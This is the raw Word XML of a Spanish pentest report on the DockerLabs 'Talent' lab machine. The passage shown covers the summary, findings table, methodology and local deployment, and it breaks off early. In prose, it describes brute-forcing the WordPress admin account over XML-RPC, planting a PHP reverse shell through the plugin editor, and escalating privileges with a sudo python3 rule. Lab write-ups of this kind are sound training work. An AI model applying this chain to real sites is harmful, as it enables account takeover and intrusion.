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F766E"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORME TÉCNICO DE PENTESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Máquina vulnerable “Talent” — Plataforma DockerLabs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación de WordPress mediante fuerza bruta de credenciales y ejecución remota de código vía editor de plugins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0FDFA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Autor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Samir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F0FDFA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Máquina objetivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">talent.dockerlabs.es</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F0FDFA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Dirección IP asignada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">172.17.0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F0FDFA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fecha de ejecución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">22 de octubre de 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F0FDFA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Entorno de pruebas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux (contenedor Docker, red docker0 172.17.0.0/16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F0FDFA" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Referencia metodológica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Write-up de pyth0nk1d (Medium) — adaptado y verificado de forma independiente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Resumen ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Este informe documenta el proceso completo de evaluación de seguridad realizado sobre la máquina vulnerable “Talent” de la plataforma DockerLabs, con fines exclusivamente educativos y de práctica en un entorno aislado (contenedor Docker local). El objetivo era obtener acceso al sistema operativo y capturar la flag presente en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El vector de compromiso principal fue un sitio WordPress expuesto en el puerto 80. Mediante enumeración con WPScan se identificó el usuario “admin”, cuyas credenciales fueron obtenidas por fuerza bruta contra el endpoint XML-RPC utilizando el diccionario rockyou.txt, resultando en la combinación admin:admin. Con acceso al panel de administración se logró ejecución remota de código (RCE) modificando el código fuente de un plugin a través del Editor de Archivos de Plugin integrado en WordPress, insertando una reverse shell en PHP y activando el plugin para desencadenar su ejecución. Esto permitió obtener una shell como el usuario del servicio web (www-data) y acceder a la flag ubicada en /home/flag.txt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A partir de ahí se logró además la escalada de privilegios hacia el usuario local “bobby”: la revisión de los privilegios sudo de www-data reveló permiso para ejecutar /usr/bin/python3 como bobby sin contraseña, técnica documentada en GTFOBins. Tras asegurar la disponibilidad del binario en el contenedor, se reutilizó la técnica con éxito, obteniendo una shell como bobby. Adicionalmente, la revisión de wp-config.php expuso credenciales de la base de datos (wpuser:wppass) que permitieron acceso de lectura a la base de datos de WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F766E"/>
        </w:rPr>
        <w:t xml:space="preserve">Hallazgos principales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shd w:fill="0F766E" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="0F766E" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Hallazgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="0F766E" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales débiles/por defecto en cuenta de administrador de WordPress (admin:admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Ausencia de protección contra fuerza bruta en el endpoint XML-RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Ejecución remota de código a través del Editor de Archivos de Plugin/Tema (funcionalidad nativa de WordPress)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Listado de directorios habilitado en rutas de temas (wp-content/themes/)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumeración de usuarios posible vía REST API / generador RSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Regla sudo (NOPASSWD) que permite a www-data ejecutar Python3 como el usuario bobby, explotable con GTFOBins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales de base de datos en texto plano dentro de wp-config.php, legible por www-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Alcance y metodología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La evaluación se realizó íntegramente contra la máquina objetivo desplegada de forma local mediante el script de despliegue oficial de DockerLabs, sin interacción con sistemas de terceros. Se siguió la metodología habitual de pruebas de penetración de caja negra:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Despliegue del entorno vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconocimiento y descubrimiento de servicios (Nmap).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeración de la aplicación web (WPScan).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación: obtención de credenciales y ejecución remota de código.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-explotación: estabilización de shell, enumeración del sistema y captura de flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intento de escalada de privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0F766E" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Despliegue del entorno</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La máquina se desplegó localmente a partir del paquete oficial descargado de DockerLabs, utilizando el script de automatización auto_deploy.sh dentro de la carpeta donde se extrajo el archivo talent.tar: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sudo bash auto_deploy.sh talent.tar</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Máquina desplegada, su dirección IP es --&gt; 172.17.0.2</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spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1. Despliegue de la máquina Talent mediante auto_deploy.sh.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se verificó la conectividad con el objetivo mediante ICMP:</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000500" cy="2105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05025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
